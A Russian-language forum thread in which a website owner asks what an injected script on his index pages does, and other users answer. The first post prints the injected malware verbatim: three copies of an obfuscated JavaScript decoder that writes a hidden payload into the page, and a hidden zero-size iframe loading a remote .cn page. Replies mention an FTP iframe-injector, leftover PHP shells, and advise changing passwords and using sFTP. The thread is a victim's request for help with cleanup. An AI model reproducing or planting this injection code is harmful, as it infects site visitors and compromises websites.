Мне установили вредоносный Java Script на index файлы

Статус
В этой теме нельзя размещать новые ответы.

Toha20072008

Профессор
Заблокирован
Регистрация
17 Фев 2008
Сообщения
314
Реакции
48
  • Автор темы
  • Заблокирован
  • #1
Мне на сайт установили какой-то непонятный Java Script на index файлы сайта. На все разделы вкоторых есть файлы index.php и index.html - сейчас не важно то как они это сделали.

Главный вопрос зачем это было нужно. Что делает этот код - который я приведу ниже.
Код:
<script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script><script>function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01){var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--){O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII){O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2}else{l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6}}document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)}}OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(\"q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO\")</script>
 
<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>



меняй пароли, у тебя сидит вирус, через фтп-ифреймер зафреймили твои скрипты.
 
  • Автор темы
  • Заблокирован
  • #3
меняй пароли, у тебя сидит вирус, через фтп-ифреймер зафреймили твои скрипты.

Первое что сделал это поменял все пароли.

А зачем они это делают - чтобы получит контроль над сайтом и получить ФТП пароли?
 
А зачем они это делают - чтобы получит контроль над сайтом и получить ФТП пароли?
Если они смогли внедрять код в твой индекс, то контроль над сайтом уже получен, теперь через твой сайт будут еще кому-то внедрять или уже внедрили...
 
  • Автор темы
  • Заблокирован
  • #5
Если они смогли внедрять код в твой индекс, то контроль над сайтом уже получен, теперь через твой сайт будут еще кому-то внедрять или уже внедрили...

Даже если я поменял пароли на ФТП и на все что можно было ??:eek:

А как расшифровать этот скрипт который они мне установили??:(
 
Даже если я поменял пароли на ФТП и на все что можно было ??:eek:
Могли остаться php-шеллы. Нужно понять как был получен доступ, возможно есть уязвимость в движке, возможно у тебя на компе троян уже живет...

А как расшифровать этот скрипт который они мне установили??:(
Для просмотра ссылки Войди или Зарегистрируйся
 
  • Автор темы
  • Заблокирован
  • #8
Могли остаться php-шеллы. Нужно понять как был получен доступ, возможно есть уязвимость в движке, возможно у тебя на компе троян уже живет...


Для просмотра ссылки Войди или Зарегистрируйся


А как избавиться от PHP шелов - их по ФТП протоколу видно? Можно их удалить?
 
ты файлы своего сайта знаешь? проверь их. если есть лишние, то удаляй.
 
sFTP надо использовать и мозг не трахать.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху